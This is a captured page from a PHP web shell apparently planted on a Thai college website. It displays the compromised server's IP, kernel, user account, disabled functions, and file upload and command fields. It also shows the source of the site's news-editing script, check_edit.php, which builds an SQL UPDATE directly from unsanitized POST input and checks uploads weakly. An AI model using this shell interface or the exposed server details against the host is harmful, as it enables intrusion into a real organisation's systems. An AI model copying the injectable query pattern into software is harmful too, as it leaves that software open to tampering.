403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/public_html/rytc/newgen/manage/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/domains/technicrayong.ac.th/public_html/rytc/newgen/manage/check_edit.php
<?php
@session_start();
$news_detail_id=$_POST['news_detail_id'];
$date=$_POST["date"];
$month=$_POST["month"];
$year=$_POST["year"];
$news_type=$_POST["news_type"];
$topics=$_POST["topics"];
$details=$_POST["details"];
$image=$_POST["image_name"];
$file_pdf=$_POST["file_pdf_name"];
$link1=$_POST["link1"];
$uploadOk = 1;
$upload_err_msg = "";
if(($_FILES['imgInp']['error'] == 0) && ($_FILES['file_pdf']['error'] == 0)){
    $target_dir = "../assets/uploads/image/";
    $target_dir_pdf = "../assets/uploads/pdf/";
    $target_file = $target_dir . basename($_FILES["imgInp"]["name"]);
    $target_file_pdf = $target_dir_pdf . basename($_FILES["file_pdf"]["name"]);
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
    $imageFileTypePdf = strtolower(pathinfo($target_file_pdf,PATHINFO_EXTENSION));

    if (file_exists($target_file)) {
        $upload_err_msg = "Sorry, file img already exists.";
        $uploadOk = 0;
    }
    if (file_exists($target_file_pdf)) {
        $upload_err_msg = "Sorry, file pdf already exists.";
        $uploadOk = 0;
    }
    if($imageFileTypePdf != "pdf") {
        $upload_err_msg = "Sorry, only PDF files are allowed.";
        $uploadOk = 0;
    }
    if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
    && $imageFileType != "gif" ) {
        $upload_err_msg = "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
        $uploadOk = 0;
    }
    if ($uploadOk == 0) {
        $upload_err_msg = "Sorry, your file was not uploaded.";
    } else {
        if (move_uploaded_file($_FILES["imgInp"]["tmp_name"], $target_file)) {
        echo "The file ". htmlspecialchars( basename( $_FILES["imgInp"]["name"])). " has been uploaded.";
            if (move_uploaded_file($_FILES["file_pdf"]["tmp_name"], $target_file_pdf)) {
                echo "The file ". htmlspecialchars( basename( $_FILES["file_pdf"]["name"])). " has been uploaded.";
            }
        } else {
        echo "Sorry, there was an error uploading your file.";
        }
    } 
}else if($_FILES['file_pdf']['error'] == 0){
    $target_dir = "../assets/uploads/pdf/";
    $target_file = $target_dir . basename($_FILES["file_pdf"]["name"]);
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
    if (file_exists($target_file)) {
        $upload_err_msg = "Sorry, file already exists.";
        $uploadOk = 0;
    }
    if($imageFileType != "pdf") {
        $upload_err_msg = "Sorry, only PDF files are allowed.";
        $uploadOk = 0;
    }
    if ($uploadOk == 0) {
        $upload_err_msg = "Sorry, your file was not uploaded.";
    } else {
        if (move_uploaded_file($_FILES["file_pdf"]["tmp_name"], $target_file)) {
            $upload_err_msg = "The file ". htmlspecialchars( basename( $_FILES["file_pdf"]["name"])). " has been uploaded.";
        $img_pdf_ok = 1;
        } else {
            $upload_err_msg = "Sorry, there was an error uploading your file.";
        }
    } 
}else if($_FILES['imgInp']['error'] == 0){
    $target_dir = "../assets/uploads/image/";
    $target_file = $target_dir . basename($_FILES["imgInp"]["name"]);
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
    if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["imgInp"]["tmp_name"]);
    if($check !== false) {
        $upload_err_msg = "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        $upload_err_msg = "File is not an image.";
        $uploadOk = 0;
    }
    }
    if (file_exists($target_file)) {
        $upload_err_msg = "Sorry, file already exists.";
        $uploadOk = 0;
    }
    if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
    && $imageFileType != "gif" ) {
        $upload_err_msg = "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
        $uploadOk = 0;
    }
    if ($uploadOk == 0) {
        $upload_err_msg = "Sorry, your file was not uploaded.";
    } else {
        if (move_uploaded_file($_FILES["imgInp"]["tmp_name"], $target_file)) {
            $upload_err_msg = "The file ". htmlspecialchars( basename( $_FILES["imgInp"]["name"])). " has been uploaded.";
        } else {
            $upload_err_msg = "Sorry, there was an error uploading your file.";
        }
    } 
}

if($uploadOk==0){
    ?>
    <script>alert("<?=$upload_err_msg;?>")</script>
    <?php
    header("Refresh:1; url=main.php");
}else if($uploadOk==1){
    @include("assets/function/connectdb.php");
    $sql_edit="UPDATE `news_detail` SET
     `date` = '$date', 
     `month` = '$month', 
     `year` = '$year', 
     `news_type` = '$news_type', 
     `topics` = '$topics', 
     `image` = '$image', 
     `details` = '$details', 
     `files_pdf` = '$file_pdf', 
     `link1` = '$link1' 
     WHERE `news_detail`.`news_detail_id` = '$news_detail_id'";
    $sql_query_edit=mysqli_query($conn,$sql_edit);
    ?>
    <script>alert("แก้ไขข้อมูลข่าวประชาสัมพันธ์เรียบร้อยแล้วครับ!!")</script>
    <?php
    header("Refresh:1; url=main.php");   
}
?>


Youez - 2016 - github.com/yon3zu
LinuXploit